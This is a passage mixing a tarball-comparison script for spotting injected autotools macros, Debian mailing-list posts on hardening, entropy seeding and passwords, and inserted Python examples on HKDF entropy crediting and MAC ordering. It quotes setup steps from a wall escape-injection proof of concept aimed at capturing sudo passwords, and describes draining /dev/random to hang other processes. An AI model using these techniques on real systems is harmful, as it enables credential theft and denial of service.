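    rel, src = tar_digests(release), tar_digests(vcs)
    return {
        "only_in_release": sorted(set(rel) - set(src)),
        "only_in_vcs": sorted(set(src) - set(rel)),
        "changed": sorted(p for p in set(rel) & set(src) if rel[p] != src[p]),
    }


def build_tar(prefix: str, files: Dict[str, bytes]) -> bytes:
    """Build an in-memory .tar.gz with the given members (used only to construct demo input)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name=f"{prefix}/{name}")
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def demo() -> Dict[str, List[str]]:
    """Constructed data: a VCS archive and a release tarball that carries two extra files."""
    vcs = build_tar("pkg-1.0", {
        "configure.ac": b"AC_INIT([pkg], [1.0])\n",
        "src/main.c": b"int main(void) { return 0; }\n",
        "NEWS": b"1.0\n",
    })
    release = build_tar("pkg-1.0", {
        "configure.ac": b"AC_INIT([pkg], [1.0])\n",
        "src/main.c": b"int main(void) { return 0; }\n",
        "NEWS": b"1.0 released\n",             # edited after tagging
        "m4/build-to-host.m4": b"# macro file absent from the VCS tree\n",
        "configure": b"#!/bin/sh\n",            # generated at release time, expected
    })
    return compare_tarballs(release, vcs)


if __name__ == "__main__":
    print(demo())
```

Generated autotools output (configure, Makefile.in, aclocal.m4) legitimately appears only in the release, so the report needs an allow-list of expected generated files; what remains in `only_in_release` and `changed` is the short list worth reading by hand, and a macro file in that list is exactly the case the advisory describes.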

Re: making Debian secure by default

2024-03-29 Thread Jeffrey Walton
On Thu, Mar 28, 2024 at 5:17 PM Lee  wrote:
>
> > Hope this helps a little bit.
>
> Yes, it does.  I was hoping for something simple but it's becoming
> clear to me that there's no simple "make Debian secure for dummies"
> checklist to follow.

Robert Morris Sr. has some good advice,
: It is
easy to run a secure computer system. You merely have to disconnect
all dial-up connections and permit only direct-wired terminals, put
the machine and its terminals in a shielded room, and post a guard at
the door.

You may remember his son, Robert Tappan Morris. He's the author of the
Morris worm from the late 1980s.

Jeff



Re: making Debian secure by default

2024-03-29 Thread Jeffrey Walton
On Wed, Mar 27, 2024 at 8:37 PM Lee  wrote:
>
> I just saw this advisory
>   Escape sequence injection in util-linux wall (CVE-2024-28085)
> https://seclists.org/fulldisclosure/2024/Mar/35
> where they're talking about grabbing other users sudo password.
>
> Apparently the root of the security issue is that wall is a setgid program?
>
> Even more fun is the instructions
>   To make sure the PoC will work, make sure your victim user can
>   actually receive messages. First check that mesg is set to y
>   (`mesg y`). If a user does not have mesg turned on, they are not
>   exploitable.
>
> WTF??  I've never heard of a mesg, but
>   $ which mesg
>   /usr/bin/mesg
>
> So.  There is a program called 'mesg',  hrmmm..
>   man mesg
> ...
>   Traditionally, write access is allowed by default.  However,  as  users
>   become  more  conscious  of various security risks, there is a trend to
>   remove write access by default, at least for the primary  login  shell.
>   To  make  sure  your ttys are set the way you want them to be set, mesg
>   should be executed in your login scripts.
>
> oof.  Are there instructions somewhere on how to make Debian secure by 
> default?

There are Security Technical Implementation Guides (STIG) for Red Hat,
Solaris, SUSE, and Ubuntu. Unfortunately, nothing for Debian. See
.
More generally, for Operating Systems, see
.

Jeff



Re: making Debian secure by default

2024-03-28 Thread Jeffrey Walton
On Thu, Mar 28, 2024 at 5:07 PM Lee  wrote:
> [...]
> > A more proactive endeavor would be to document known best practices
> > on the wiki.  A quick search found a couple pages that might serve
> > as starting points:
> >
> > https://wiki.debian.org/SecurityManagement
> > https://wiki.debian.org/Hardening  -- says it's for package maintainers
> >
> > Anyone who is serious about such a project probably has a long road ahead
> > of them.
>
> Is there a generally preferred web link checker program for Debian?
> I took a look at
>   https://www.debian.org/doc/manuals/securing-debian-manual/ch04s15.en.html
> and the 4.15. Protecting against buffer overflows section has this bit:
> recompile the source code to introduce proper checks that prevent
> overflows, using the
>  http://www.research.ibm.com/trl/projects/security/ssp/ patch for GCC
> (which is used by
>  http://www.adamantix.org)
>
> http://www.research.ibm.com/trl/projects/security/ssp/ patch gives me
> a connect failed and
> http://www.adamantix.org sends me to a vietnamese tv site??
>
> Seems to me that an easy first step would be to check that all the
> links still work.

Wikipedia changes links to the Wayback Machine once a link goes bad.

Jeff



Re: System hangs at GDM login or a bit later...

2024-03-27 Thread Jeffrey Walton
On Wed, Mar 27, 2024 at 4:47 PM nimrod  wrote:
>
> I'm having this annoying behaviour from GDM (or something related).
>
> Quite often, after the GDM login screen appears, the host freezes completely: 
> every input device is unresponsive, no ssh connection from another host is 
> possible any more, no CTRL+ALT+CANC/F1-F6 is working.
>
> But the same happens also while I'm typing the username or the password, or 
> after the login screen disappears because the login was successful, or even a 
> bit after the dash has appeared at the bottom of the screen.
>
> Looking at boot.log, the last line before the next boot reads "[ OK ] Started 
> gdm.service - GNOME Display Manager".
>
> Looking at syslog instead, the lines are not always the same, but usually 
> there is something like this:
>
> 2024-03-27T17:57:25.479168+01:00 SW-GIULIANO 
> /usr/libexec/gdm-x-session[1831]: (II) Initializing extension RECORD
> 2024-03-27T17:57:25.479455+01:00 SW-GIULIANO 
> /usr/libexec/gdm-x-session[1831]: (II) Initializing extension DPMS
> 2024-03-27T17:57:25.479734+01:00 SW-GIULIANO 
> /usr/libexec/gdm-x-session[1831]: (II) Initializing 
> ext2024-03-27T17:58:25.469753+01:00 SW-GIULIANO systemd-modules-load[394]: 
> Inserted module 'lp'
> 2024-03-27T17:58:25.469853+01:00 SW-GIULIANO kernel: [ 0.00] microcode: 
> microcode updated early to revision 0xf4, date = 2023-02-23
>
> Please note how the third line suddenly ends with "ext", followed immediately 
> by the first line written by the next boot sequence.
>
> The"gdm-x-session" lines above are just the last of a very long list. I can 
> provide other logs if requested.
>
> Any hint would be very appreciated.

Can you boot to a previous kernel? Hold SHIFT when the BIOS hands off
to Grub to get the Grub menu.

If not, then ... maybe a hardware problem. Start with a memory
checker. Then move on to disabling the GPU.

Jeff



Re: seeding /dev/random from a security key

2024-03-26 Thread Jeffrey Walton
On Tue, Mar 26, 2024 at 7:12 PM Björn Persson  wrote:
>
> Jeffrey Walton wrote:
> > For what you want to do, and if I am parsing it correctly... I would
> > write a daemon in C [...]
>
> Only in the unlikely case that both RNGD and SCDrand turn out unsuitable
> somehow. Writing and compiling a daemon is no less work than compiling
> an already written daemon.
>
> > The part about extracting the entropy from the source would use
> > OpenSSL or GnuPG. I believe you would compile and link to OpenSSL's
> > libcrypto.{a|so}, or GnuPG's libgcrypt.{a|so}.
>
> RNGD 6 actually uses OpenSC's libp11, where it calls the function
> PKCS11_generate_random, which in turn calls the PKCS #11 function
> C_GenerateRandom.

It sounds like you have it sorted out. Good luck with it.

Jeff



Re: Debian 11 PHP 7.4 – Mysql 8 - Can’t get Mysqli_connect to work

2024-03-26 Thread Jeffrey Walton
On Tue, Mar 26, 2024 at 1:17 PM Marco Moock  wrote:
>
> Am 26.03.2024 um 10:33:59 Uhr schrieb Bernard:
>
> > I have the two // in the displayed error messages. However the file
> > is where it should be, without double //
>
> The this seems to be a bug because if it searches for //file it will
> definitely not find it.
> Can you use strace to verify that?

Also see .

Jeff



Re: seeding /dev/random from a security key

2024-03-26 Thread Jeffrey Walton
On Tue, Mar 26, 2024 at 11:52 AM Björn Persson  wrote:
>
> Jeffrey Walton wrote:
> > Out of morbid curiosity, what hardware are the servers using? RDRAND
> > and RDSEED have been available since about 2012, so it is mostly
> > ubiquitous nowadays.
>
> Do you mean I should add to the e-waste pile by throwing away working
> hardware and buy an entire new computer instead of buying a tiny dongle?

No, I was wondering about the server hardware. I would be surprised to
learn of something without Intel's SecureKey nowadays (assuming it is
x86{-64} based).

> > Be careful of rng-tools. It does not do a good job for non-mainstream
> > generators, like VIA's Padlock Security Engine. And rng-tools did not
> > support generators for architectures, like you would find on ARM,
> > aarch64 and PowerPC.
>
> I figure it can be used with devices it supports even if there are some
> other devices it doesn't support – but it looks like I'd have to build
> it from source myself.

Yeah, I've had to do that in the past. You will also (probably) need
to write a systemd unit file or two.

> > OpenSSL and GnuPG should be
> > able to extract the entropy from the card, and then use it to seed
> > /dev/{u}random.
>
> This job requires a daemon. OpenSSL is a library. Or do you mean its
> command-line tool? So how would I tell that to fetch random data
> through PKCS #11?
>
> GnuPG at least has a daemon called scdaemon. Is that what you mean? So
> how would I tell that to fetch random data through PKCS #11 and write
> to /dev/random?

For what you want to do, and if I am parsing it correctly... I would
write a daemon in C to collect the entropy from the source, then
extract the entropy from the bytes, and then insert the entropy into
the system's random number generator. For entropy extraction, take a
look at HKDF and Krawczyk's paper. Krawczyk does a good job of cleanly
separating entropy extraction from later stage key expansion.

The part about extracting the entropy from the source would use
OpenSSL or GnuPG. I believe you would compile and link to OpenSSL's
libcrypto.{a|so}, or GnuPG's libgcrypt.{a|so}. Since this is a daemon
and not a driver, I believe you can use the shared objects.

I eat my own dog food. I've done similar in the past with both an
EntropyKey and custom on-board generator for a MIPS Creator CI-20 with
the jz4780-rng. For the EntropyKey, I did not even bother decrypting
the stream. I stuffed the encrypted stream right into /dev/random,
because the amount of entropy does not change regardless of the
formatting (encrypted vs unencrypted).

And you may find this interesting... Debian suffers entropy depletion
on /dev/random and can hang components that use it, including
/dev/urandom. It is easy for a userland process to do. All you need is
a stock Debian system _without_ an entropy gatherer like Haveged. Have
your program perform a big read on /dev/random with O_NONBLOCK. The
kernel will return every last bit of entropy it has, and then start
blocking processes. The only way to recover in reasonable time is to
run a daemon like Haveged. I reported it to the devs several years
ago, but there was no interest in fixing it.

Jeff
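The three steps above (collect raw bytes, extract with HKDF, push the result into the kernel's generator) as an added example, not code from this thread. The post suggests a C daemon; this shows the same pipeline with only the Python standard library so it can be read without libcrypto or libgcrypt. The raw chunk is a constructed stand-in for what a daemon would pull from a token over PKCS#11, the extractor salt is an assumed fixed label, and the RNDADDENTROPY value is taken from my reading of <linux/random.h>. One caveat the post glosses over: write(2) to /dev/random only mixes bytes in and credits nothing, so stuffing a stream into the device does not unblock readers; the ioctl is what raises the entropy count.

```python
"""Added example (not code from the thread): condition raw hardware-RNG
output with HKDF-Extract and credit it to the Linux kernel pool.

Standard library only.  The raw bytes are a constructed stand-in for
what a daemon would pull from a token over PKCS#11.
"""
import fcntl
import hashlib
import hmac
import os
import struct

# Assumed from <linux/random.h>: RNDADDENTROPY = _IOW('R', 0x03, int[2]),
# which encodes to 0x40085203 on the common architectures.
RNDADDENTROPY = 0x40085203

# Fixed extractor salt.  RFC 5869 allows a non-secret, reused salt;
# the label itself is an assumption, any fixed value works.
EXTRACT_SALT = b"example-entropy-daemon-v1"
HASH = hashlib.sha256


def hkdf_extract(salt: bytes, ikm: bytes) -> bytes:
    """HKDF-Extract (RFC 5869, 2.2): PRK = HMAC-Hash(salt, IKM)."""
    if not salt:
        salt = bytes(HASH().digest_size)
    return hmac.new(salt, ikm, HASH).digest()


def hkdf_expand(prk: bytes, info: bytes, length: int) -> bytes:
    """HKDF-Expand (RFC 5869, 2.3).  Not needed to seed the kernel; shown
    because the post separates extraction from later expansion."""
    okm, block, counter = b"", b"", 1
    while len(okm) < length:
        block = hmac.new(prk, block + info + bytes([counter]), HASH).digest()
        okm += block
        counter += 1
    return okm[:length]


def condition(raw: bytes, bits_per_byte: float) -> tuple:
    """Extract a 32-byte seed from one chunk of raw generator output and
    return (seed, bits_to_credit).

    bits_per_byte is the operator's conservative entropy rating for the
    source; the credit never exceeds the 256 bits the seed can hold."""
    seed = hkdf_extract(EXTRACT_SALT, raw)
    credit = min(len(seed) * 8, int(len(raw) * bits_per_byte))
    return seed, credit


def pool_info(data: bytes, entropy_bits: int) -> bytes:
    """Pack struct rand_pool_info { int entropy_count; int buf_size;
    __u32 buf[]; } as the ioctl expects: entropy_count in bits, buf_size
    in bytes, buffer padded out to whole __u32 words."""
    if not 0 <= entropy_bits <= len(data) * 8:
        raise ValueError("cannot credit more bits than were supplied")
    pad = (-len(data)) % 4
    return struct.pack("ii", entropy_bits, len(data)) + data + bytes(pad)


def credit_entropy(data: bytes, entropy_bits: int, device: str = "/dev/random") -> None:
    """Mix data into the kernel pool and raise the entropy count.

    Plain write(2) to /dev/random only mixes; it credits nothing, so a
    daemon that wants to unblock readers must use RNDADDENTROPY, which
    needs CAP_SYS_ADMIN."""
    fd = os.open(device, os.O_WRONLY)
    try:
        fcntl.ioctl(fd, RNDADDENTROPY, pool_info(data, entropy_bits))
    finally:
        os.close(fd)


if __name__ == "__main__":
    raw_chunk = os.urandom(64)  # constructed stand-in for the token's output
    seed, bits = condition(raw_chunk, bits_per_byte=4.0)  # assume a 4 bits/byte rating
    print(f"seed={seed.hex()} credit={bits} bits")
    try:
        credit_entropy(seed, bits)
        print("credited to /dev/random")
    except PermissionError:
        print("not root: skipping RNDADDENTROPY")
```

Run it as root to see the credit land (`cat /proc/sys/kernel/random/entropy_avail` before and after); as an unprivileged user it only prints the conditioned seed. The credit is deliberately capped by the operator's rating of the source rather than by the size of the chunk, which is the conservative choice when the raw stream has not been characterised.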



Re: seeding /dev/random from a security key

2024-03-25 Thread Jeffrey Walton
On Mon, Mar 25, 2024 at 4:33 PM Björn Persson  wrote:
>
> In a quest to acquire hardware random number generators for seeding
> /dev/random on servers that lack a built-in entropy source, I'm
> investigating how random data can be obtained from a security key such
> as a Nitrokey, Yubikey or a similar device.

Out of morbid curiosity, what hardware are the servers using? RDRAND
and RDSEED have been available since about 2012, so it is mostly
ubiquitous nowadays.

> RNGD version 6 from https://github.com/nhorman/rng-tools can fetch
> random data through a PKCS #11 interface, but the two versions of RNGD
> in Debian seem to lack that ability. Debian has rng-tools5 and
> rng-tools-debian, but not Neil Horman's version 6. Or am I just failing
> to find it?

Be careful of rng-tools. It does not do a good job for non-mainstream
generators, like VIA's Padlock Security Engine. And rng-tools did not
support generators for architectures, like you would find on ARM,
aarch64 and PowerPC.

> SCDrand from https://incenp.org/dvlpt/scdtools.html can also obtain
> random data from a "smartcard"-compatible device, but I don't find that
> in Debian either.
>
> Does anyone know of another way to obtain random data from devices of
> this kind?

PKCS#11 is a standard interface. If the card provides a generator,
then the code is the same for all cards. OpenSSL and GnuPG should be
able to extract the entropy from the card, and then use it to seed
/dev/{u}random.

But keep in mind ... the kernel crypto folks effectively deprecated
/dev/random, and recommend using /dev/urandom for your random bits. Or
use getrandom(2). See .

Jeff



Re: Debian 11 PHP 7.4 – Mysql 8 - Can’t get Mysqli_connect to work

2024-03-24 Thread Jeffrey Walton
On Sun, Mar 24, 2024 at 5:57 PM Bernard  wrote:
>
> Hi to Everyone !
>
> PHP Warning: PHP Startup: Unable to load dynamic library 
> '//usr/lib/php/20190902/mysqli.so' However, the file is there... not human 
> readable as expected and mysqli_connect doesn't operate.

Please provide the output of `ls -Al /usr/lib/php` and `ls -Al
/usr/lib/php/20190902`. If you are running SELinux, then use `ls -AlZ`
instead.

Also state what user your web server runs under.

You may need to show your php.ini.

Jeff



Re: How does the 64bits time_t transition work?

2024-03-23 Thread Jeffrey Walton
On Wed, Mar 20, 2024 at 4:23 AM Brad Rogers  wrote:
>
> On Wed, 20 Mar 2024 08:22:16 +0100
> Detlef Vollmann  wrote:
>
> >Is there a description anywhere how the 64bit time transition works?
>
> I'm far from an expert, but from what I've read, this transition is
> *huge*.  Possibly the largest that has ever occurred in Debian.  It's
> going to take time to get it done.  Lots, and lots, of time.  In the
> meanwhile, it means a good deal of disruption in Sid/unstable.
>
> You should already be aware that running sid comes with certain
> difficulties, and if you're not prepared/willing to deal with them then,
> in all likelihood, Sid isn't for you.

Some folks don't have a choice. To run Debian ports in a Debian
QEMU/Chroot, you have to run Unstable in the guest. You cannot run
Stable or Testing in the guest.

I guess the other choice is to forgo testing on various Debian
architectures. But that seems like a worse choice for everyone
involved. Personally, I would not feel good about this path. I don't
want Debian users and Debian packagers to experience problems I should
have caught during testing.

> Following Marco's advice would be a good first step, IMO.

I don't think this migration was planned well. Debian should have
created a temporary *-t64 port, and then released the appropriate
ISOs. Later, when things got stable, the *-t64 port could have been
merged back into the standard port all at once.

Jeff



Re: Root password strength

2024-03-20 Thread Jeffrey Walton
On Wed, Mar 20, 2024 at 2:34 PM Pierre-Elliott Bécue  wrote:
>
> Jeffrey Walton  wrote on 20/03/2024 at 19:16:16+0100:
>
>  [...]
> >> Noone asks someone to remember more than two or three passwords. The
> >> rest belongs to a password manager.
> >
> > Huh? This is discussed in detail in Peter Gutmann's Engineering
> > Security, <https://www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf>,
> > Chapter 7. In particular, pages 565-567 discussed the Selfish Security
> > Model.
>
> And because it's discussed in an irrelevant pdf means it's what one asks
> in this thread?

I don't think I would call Gutmann's book on Security Engineering "irrelevant."

Gutmann earned his PhD in Security Usability. He's written two books
on the subject. He also wrote a book on Security Engineering (cited
above). He participates in IETF Working Groups, and has authored a few
RFCs. I would not make the mistake of dismissing his work as
irrelevant.

> Do you want to also bring in security practices from the 80's?

Jeff



Re: Root password strength

2024-03-20 Thread Jeffrey Walton
On Wed, Mar 20, 2024 at 1:45 PM Pierre-Elliott Bécue  wrote:
>
>
> Jeffrey Walton  wrote on 20/03/2024 at 18:30:34+0100:
>
> > On Wed, Mar 20, 2024 at 12:51 PM Pierre-Elliott Bécue  
> > wrote:
> >>
> >> Jeffrey Walton  wrote on 20/03/2024 at 17:19:46+0100:
> >>
> >> > On Wed, Mar 20, 2024 at 12:09 PM Pierre-Elliott Bécue  
> >> > wrote:
> >> >>
> >> >> John Hasler  wrote on 20/03/2024 at 16:58:01+0100:
> >> >>
> >> >> > Pierre-Elliott Bécue writes:
> >> >> >> A phrase you will easily remember but that would be hardcore to guess
> >> >> >> through social engineering is perfect.
> >> >> >
> >> >> > Better is a random string that you write down.  When people try to
> >> >> > generate phrases that meet those requirements they usually fail.
> >> >>
> >> >> Writing down a password is a bad idea.
> >> >
> >> > I don't think that's true anymore. The threat being mitigated is the
> >> > network attacker. The network attacker cannot (yet) reach through a
> >> > monitor and read a sticky note.
> >>
> >> Mitigating a specific threat by adding a new one is not a proper way to
> >> handle a threat when one can avoid both.
> >
> > What does your threat model look like?
>
> My home sees plenty different people coming in. Some I trust, some I
> trust less. Also videocalls is a nice way to get a paper password
> recorded (and yes it happens).

So now you are arguing someone jumps on a Zoom call, and then displays
their passwords to the camera. If we are going to use far-fetched
examples, then write the password down with invisible ink. Recover it
when needed using the special pen provided with the junior spy kit.

> Same goes for company.

Companies generally have physical security on their assets. No one is
going to wander in the server room unsupervised. No one is going to
wander the cubicles lifting mouse pads and looking through drawers
without raising suspicion.

If someone is allowed to do those things, then the company's controls
are not going to be very helpful, and the company has bigger problems.

> > Are spouses who go through a purse or wallet to retrieve a company
> > password a threat in your model? If that's the case, then you have
> > compensating controls to mitigate the threat, like physical security
> > on the office workspace.
> >
> >> > It is also why it's OK for a system to generate a list of recovery
> >> > codes, and have the user print them and store them in a safe place.
> >> > The other option are those cursed security questions, which have been
> >> > insecure for about 20 years now (but developers have their arms
> >> > wrapped around).
> >>
> >> A recovery code is generally designed to troubleshoot 2FA issues, not as
> >> a replacement for the first layer of security that a password is.
> >
> > I believe recovery codes to regain access to an account due to a lost
> > or forgotten password predates 2FA. Most businesses I've worked with
> > use a Self-Service scheme, like recovery codes, to avoid the Help Desk
> > call. Some use the cursed security questions.
>
> Yes, but in that case there's another point, which is a contact mail
> address.
>
> And even this way it's problematic.
>
> > I am aware some European banks use Temporary Access Numbers (TANs) as
> > a form of 2FA. (I've never seen them used in the US). Each month a
> > [new] TAN is included with the printed and mailed account statement.
> > The "postal channel" is considered reasonably secure. Again, the
> > threat being mitigated is the network attacker, not a nosy spouse.
>
> Again, trying to mitigate one threat by creating a full range of other
> threats is the recipe for disaster.

I think you are throwing the baby out with the bathwater. Taking a big
problem (the network attacker) and reducing it to a smaller problem
(securing recovery codes) reduces risk.

I read about account compromises all the time. The creative ones use
SIM swaps to circumvent 2FA. I can't remember an instance of an
account compromise because a thief stole a wallet or safe.

> >> And therefore if it were to circumvent this first layer, then no, it's
> >> not ok to print them, except if you indeed have a safe.
> >>
> >> But in general it's a better approach to avoid having to resort to
> >> printed password on a paper.
> >
> > Humans are human. We have to understand their psychology and
> > limitations. Part of that is realizing

Re: Root password strength

2024-03-20 Thread Jeffrey Walton
On Wed, Mar 20, 2024 at 12:51 PM Pierre-Elliott Bécue  wrote:
>
> Jeffrey Walton  wrote on 20/03/2024 at 17:19:46+0100:
>
> > On Wed, Mar 20, 2024 at 12:09 PM Pierre-Elliott Bécue  
> > wrote:
> >>
> >> John Hasler  wrote on 20/03/2024 at 16:58:01+0100:
> >>
> >> > Pierre-Elliott Bécue writes:
> >> >> A phrase you will easily remember but that would be hardcore to guess
> >> >> through social engineering is perfect.
> >> >
> >> > Better is a random string that you write down.  When people try to
> >> > generate phrases that meet those requirements they usually fail.
> >>
> >> Writing down a password is a bad idea.
> >
> > I don't think that's true anymore. The threat being mitigated is the
> > network attacker. The network attacker cannot (yet) reach through a
> > monitor and read a sticky note.
>
> Mitigating a specific threat by adding a new one is not a proper way to
> handle a threat when one can avoid both.

What does your threat model look like?

Are spouses who go through a purse or wallet to retrieve a company
password a threat in your model? If that's the case, then you have
compensating controls to mitigate the threat, like physical security
on the office workspace.

> > It is also why it's OK for a system to generate a list of recovery
> > codes, and have the user print them and store them in a safe place.
> > The other option are those cursed security questions, which have been
> > insecure for about 20 years now (but developers have their arms
> > wrapped around).
>
> A recovery code is generally designed to troubleshoot 2FA issues, not as
> a replacement for the first layer of security that a password is.

I believe recovery codes to regain access to an account due to a lost
or forgotten password predates 2FA. Most businesses I've worked with
use a Self-Service scheme, like recovery codes, to avoid the Help Desk
call. Some use the cursed security questions.

I am aware some European banks use Temporary Access Numbers (TANs) as
a form of 2FA. (I've never seen them used in the US). Each month a
[new] TAN is included with the printed and mailed account statement.
The "postal channel" is considered reasonably secure. Again, the
threat being mitigated is the network attacker, not a nosy spouse.

> And therefore if it were to circumvent this first layer, then no, it's
> not ok to print them, except if you indeed have a safe.
>
> But in general it's a better approach to avoid having to resort to
> printed password on a paper.

Humans are human. We have to understand their psychology and
limitations. Part of that is realizing a user cannot possibly remember
all the passwords required in the internet age. A big part of the
problem is what is known as the "Selfish Security Model for Password
Authentication." Each website wants a user to have an account and
manage a password. It is an impossible feat for folks to accomplish,
and that's why problems like password reuse across security domains
happens.

> >> Managing passwords through a password-store (eg pass, keepassxc,
> >> whatever tool you prefer) is a great idea, but you first need to unlock
> >> your disk that hopefully you encrypted and then your session. And if
> >> your laptop is borken, then having a root password you actually can
> >> remember is better.
> >
> > I believe NIST now approves online password managers. But I don't
> > trust them given the number of data breaches.
>
> Yes, but I wouldn't dare use one.

Jeff



Re: Root password strength

2024-03-20 Thread Jeffrey Walton
On Wed, Mar 20, 2024 at 12:09 PM Pierre-Elliott Bécue  wrote:
>
> John Hasler  wrote on 20/03/2024 at 16:58:01+0100:
>
> > Pierre-Elliott Bécue writes:
> >> A phrase you will easily remember but that would be hardcore to guess
> >> through social engineering is perfect.
> >
> > Better is a random string that you write down.  When people try to
> > generate phrases that meet those requirements they usually fail.
>
> Writing down a password is a bad idea.

I don't think that's true anymore. The threat being mitigated is the
network attacker. The network attacker cannot (yet) reach through a
monitor and read a sticky note.

It is also why it's OK for a system to generate a list of recovery
codes, and have the user print them and store them in a safe place.
The other option is those cursed security questions, which have been
insecure for about 20 years now (but developers have their arms
wrapped around them).

> Managing passwords through a password-store (eg pass, keepassxc,
> whatever tool you prefer) is a great idea, but you first need to unlock
> your disk that hopefully you encrypted and then your session. And if
> your laptop is borken, then having a root password you actually can
> remember is better.

I believe NIST now approves online password managers. But I don't
trust them given the number of data breaches.

> Let's stop to overcomplexify, the best course of action for passwords
> you need to remember are passphrases, and to this matter, Randall nailed
> the matter properly.

Jeff



Re: Root password strength

2024-03-20 Thread Jeffrey Walton
On Wed, Mar 20, 2024 at 7:03 AM Michael Kjörling <2695bd53d...@ewoof.net> wrote:
>
> On 20 Mar 2024 15:46 +0800, from jeremy.ard...@gmail.com (jeremy ardley):
> > Regarding certificates, I issue VPN certificates to be installed on each
> > remote device. I don't use public key.
>
> What exactly is this "certificate" that you speak of? In typical
> usage, it means a public key plus some surrounding metadata, but you
> say that you "don't use public key".
>
>
> > For ssh use I issue secret keys to each user and maintain matching public
> > keys in LDAP servers.  SSHD servers can get the public keys in real time by
> > using the AuthorizedKeysCommand. If a secret key is compromised I simply
> > remove the matching public key.
> >
> > [users are locked out from uploading their public key using ssh-copy-id]
>
> So the private keys aren't private, thereby invalidating a lot of
> assumptions inherent in public key cryptography.
>
> Also, are you saying that you do not let users rotate their keys
> themselves; and if so, why on Earth not?

Key continuity has turned out to be a better security property than
key rotation. It is wise to avoid gratuitous rotation schemes.

Jeff



Re: Root password strength

2024-03-20 Thread Jeffrey Walton
On Wed, Mar 20, 2024 at 1:32 AM  wrote:
>
> On Wed, Mar 20, 2024 at 04:22:29AM +0800, jeremy ardley wrote:
>
> > A 'safer' implementation will not even expose an ssh port. Instead there
> > will be a certificate based VPN where you first need a certificate to
> > connect and then you need a separate certificate to log in as root. A
> > further enhancement of security is to use 2-factor authentication - which is
> > supported in sshd via pam.
>
> How will a "VPN" with a "certificate" (whatever that means in this context)
> be more secure than a SSH (assuming key pair authentication, not password)?

This may be more theoretical, but... IPSec uses
Encrypt-then-Authenticate (EtA), which is provably secure under random
models. In fact, I believe IPSec is IND-CCA2 secure (Ciphertext
Indistinguishability), which is a strong notion of security. SSH uses
Encrypt-and-Authenticate (E&A), which is provably insecure. The SSH
protocol leaks information because of the order of operations of
encryption and authentication.

As far as the certificate, I suspect it alludes to public key. Both
IPSec and SSH can use public key cryptography (as opposed to
passwords), so they are about equally secure (compared to passwords).
IPSec is actually a little stronger with provable security properties
because it uses HKDF after key agreement to derive bulk encryption
keys. And I believe IPSec performs a key confirmation step, which
helps with the security proofs.

The IPSec standard is maintained by Hugo Krawczyk and associates. Hugo
is a world class cryptographer. That's why the IPSec protocol does not
have the theoretical defects of SSH (or TLS).

Krawczyk is also the author of The Order of Encryption and
Authentication for Protecting Communications,
. It is a very
good paper.

> They are doing the same dance (key exchange, key pair validation, session
> key establishment) -- the "certificate" part is just a step further (and,
> BTW, SSH can do that, too), which just eases key management (at the expense
> of security: you have but one more moving part).
>
> The "port" thing stays the same: the VPN server uses a TCP connection, too.
>
> Moving the port to a non-standard number, using fail2ban, firewall knocking
> and those things don't increase security *directly* -- they just remove
> noise from the logs, which eases the admin's task and thus increase security
> indirectly.
>
> There's no magic.

Jeff
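The order-of-operations point from the reply above, as an added example that is not part of the thread. It builds the two compositions the post contrasts, Encrypt-and-Authenticate (SSH-style, tag over the plaintext) and Encrypt-then-Authenticate (IPsec-style, tag over the ciphertext), from constructed toy primitives in the Python standard library: a stream cipher made from HMAC-SHA256 in counter mode stands in for the real cipher (it is not AES), and HMAC-SHA256 is the MAC. Sequence numbers, which real SSH folds into the MAC input, are deliberately left out so the generic weakness stays visible: nothing in the definition of a MAC promises to hide its input, so E&A can leak plaintext facts that EtA structurally cannot.

```python
"""Added example (not from the thread): Encrypt-and-MAC versus
Encrypt-then-MAC, the distinction the post draws between SSH and IPsec.

Constructed toy primitives, standard library only: a stream cipher made
from HMAC-SHA256 in counter mode stands in for the real cipher (it is
not AES), and HMAC-SHA256 is the MAC.  Sequence numbers, which SSH folds
into its MAC input, are deliberately left out to keep the leak visible.
"""
import hashlib
import hmac
import os
import struct

TAG_LEN = 32
NONCE_LEN = 16


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy PRF-in-counter-mode keystream; never reuse a (key, nonce) pair."""
    out, ctr = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + struct.pack(">Q", ctr), hashlib.sha256).digest()
        ctr += 1
    return out[:length]


def stream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt (same operation for a stream cipher)."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, nonce, len(data))))


def mac(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.sha256).digest()


def seal_encrypt_and_mac(ek: bytes, mk: bytes, nonce: bytes, msg: bytes) -> bytes:
    """E&A (SSH-style): nonce || E(msg) || MAC(msg).  Tag is over the plaintext."""
    return nonce + stream_xor(ek, nonce, msg) + mac(mk, msg)


def seal_encrypt_then_mac(ek: bytes, mk: bytes, nonce: bytes, msg: bytes) -> bytes:
    """EtA (IPsec-style): C = nonce || E(msg); send C || MAC(C)."""
    ct = nonce + stream_xor(ek, nonce, msg)
    return ct + mac(mk, ct)


def open_encrypt_then_mac(ek: bytes, mk: bytes, packet: bytes) -> bytes:
    """Verify the tag over the ciphertext first; nothing is decrypted
    unless the packet is authentic."""
    ct, tag = packet[:-TAG_LEN], packet[-TAG_LEN:]
    if not hmac.compare_digest(mac(mk, ct), tag):
        raise ValueError("authentication failed")
    return stream_xor(ek, ct[:NONCE_LEN], ct[NONCE_LEN:])


def open_encrypt_and_mac(ek: bytes, mk: bytes, packet: bytes) -> bytes:
    """E&A forces the receiver to decrypt unauthenticated bytes before it
    can check the tag, because the tag is over the plaintext."""
    body, tag = packet[:-TAG_LEN], packet[-TAG_LEN:]
    msg = stream_xor(ek, body[:NONCE_LEN], body[NONCE_LEN:])
    if not hmac.compare_digest(mac(mk, msg), tag):
        raise ValueError("authentication failed")
    return msg


def tags_collide(seal, ek: bytes, mk: bytes, msg: bytes, n1: bytes, n2: bytes) -> bool:
    """Send the same message twice under fresh nonces and compare tags.
    Under E&A the repeated tag tells an eavesdropper that the two packets
    carry the same plaintext even though the ciphertexts differ."""
    return seal(ek, mk, n1, msg)[-TAG_LEN:] == seal(ek, mk, n2, msg)[-TAG_LEN:]


if __name__ == "__main__":
    ek, mk = os.urandom(32), os.urandom(32)
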